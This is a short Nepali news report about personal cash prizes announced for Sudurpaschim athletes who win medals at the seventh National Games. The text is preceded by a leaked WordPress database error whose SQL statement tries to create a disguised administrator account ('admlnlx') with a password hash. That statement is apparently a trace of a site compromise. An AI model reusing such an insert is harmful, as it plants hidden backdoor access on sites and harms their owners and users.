WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BquPwLEcQC6ftWbnbPENIxt62UsYrK1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-07 16:49:47', '', 'admlnlx', 'admlnlx')
धनगढी, पुस ११ –
विराटनगरमा जारी सातौँ राष्ट्रिय खेलकुद प्रतियोगितामा सुदूरपश्चिमलाई पदक जिताउने खेलाडीलाई व्यक्तिगत रुपमा पुरस्कार प्रदान गर्ने घोषणा गरिएको छ ।
राष्ट्रिय खेलकुद परिषद्का केन्द्रीय सदस्य एकिन्द्र कुँवरले व्यक्तिगत रुपमा नगद पुरस्कार घोषणा गर्नुभएको हो ।
स्वर्ण पदक जित्नेलाई नगद रु १० हजार, रजत पदक जित्नेलाई नगद रु पाँच हजार र काँस्य पदक जित्नेलाई नगद रु तीन हजार पुरस्कार दिने केन्द्रीय सदस्य कुँवरले जानकारी दिनुभयो ।
खेलाडीको हौसला बढाउन र उत्प्रेरणा दिनका लागि आफूले व्यक्तिगत रुपमा नगद पुरस्कार दिने घोषणा गरेको कुँवरको भनाइ छ । – रासस